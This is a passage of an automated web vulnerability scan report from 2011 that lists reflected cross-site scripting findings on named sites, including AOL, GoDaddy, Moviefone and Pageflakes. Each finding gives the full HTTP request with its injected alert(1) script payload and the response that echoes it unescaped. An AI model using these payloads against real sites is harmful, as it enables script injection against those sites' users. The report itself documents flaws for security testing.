The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f3c"-alert(1)-"56010fc58d0 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
cle";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545a2f3c"-alert(1)-"56010fc58d0";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)do
...[SNIP]...

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae19"><script>alert(1)</script>22fc5ab7398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:29 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:29 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:28 GMT; path=/
Content-Type: text/html
Content-Length: 63649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1" />
...[SNIP]...

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c4"-alert(1)-"b34755837c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:30 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:29 GMT; path=/
Content-Type: text/html
Content-Length: 63576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
le";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)
...[SNIP]...

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776d"><script>alert(1)</script>59ea0380dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4776d"><script>alert(1)</script>59ea0380dd4=1 HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:50 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:50 GMT; path=/
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 109015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
<link rel="canonical" href="http://www.moviefone.com/?4776d"><script>alert(1)</script>59ea0380dd4=1"/>
...[SNIP]...

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e187'-alert(1)-'e1daaea1081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /subscribe.aspx7e187'-alert(1)-'e1daaea1081 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:08 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=00AC81F260BA9A6D5FA9BF2E0A5F34B290777F13E4510D1166BCE4233715DDEC395F69E8143FCA0F905E564697A39C5855E5440A009381B14F7875F0917C6901D8FE5AE37B98CA6E21AAD688744FF342303E26421E926E5FA383B0022C4C45AF471CF31D7A9D60D5B866965A7C42DDCA932D74F3CA2E00A36A7F9949B4A359D81D6DCDB425DF75620502301B6EF64F4D920D4140F5819ED98494DEE07ECC46C9; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspx7e187'-alert(1)-'e1daaea1081&r=634401657685468750';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ee6f</script><script>alert(1)</script>846c743547c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /subscribe.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:05 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=09FEB47CFC6C6A3A9CA82F8313EDF2FE88BD584DCED8EA19F6FD5A6B17B4D3C5BFF448D5D70CC1BF473FFFE48C5DBACF66A47473612D3815F39076794F7B12ACF3C8D603D3511D39B29AD35BD13D362716DCA879751F283A6D1327219E1B538164FF4EA0D7830D9FB100B88E01C8BDB5DB7CF2F4D2637593CD2A55D43ECD5000BA7FB7D32E5787A99668E771D32E757968FCD8E1FC9BF5EEEC2F1574D9F16181; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d2e1"-alert(1)-"80c66c7340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?6d2e1"-alert(1)-"80c66c7340=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:56 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:56 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?6d2e1"-alert(1)-"80c66c7340=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/hub/app-reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40b1"-alert(1)-"ce34c6a708f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1 HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:21 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:21 GMT; path=/
Content-Type: text/html
Content-Length: 32731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
l="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="show-hub-apps";
s_265.prop12="http://www.tuaw.com/hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1";
s_265.prop16="TUAW";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="mtc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 4ed38<script>alert(1)</script>672c0d44255 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:59 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=MOIOEHOALFKFLEHAKEPOPGGK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255</b>
...[SNIP]...

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7508f<script>alert(1)</script>c497b79206d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:46 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=AMIOEHOAKNNAOPGJAGICKMHH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d</b>
...[SNIP]...

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 55b68<script>alert(1)</script>34586a0b13b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:42 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FLIOEHOAOGCDEGEAJKDIKAPM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b</b>
...[SNIP]...

2.50. http://www.aol.com/ [dlact cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1124"-alert(1)-"6a0d04d96d1 was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2a1124"-alert(1)-"6a0d04d96d1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=47F3597F5AADCEB36B262F261CE5067A; Path=/aol
Content-Length: 63405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl2a1124"-alert(1)-"6a0d04d96d1";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 13;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.51. http://www.aol.com/ [rrpmo1 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d687"-alert(1)-"65e99ea59a8 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
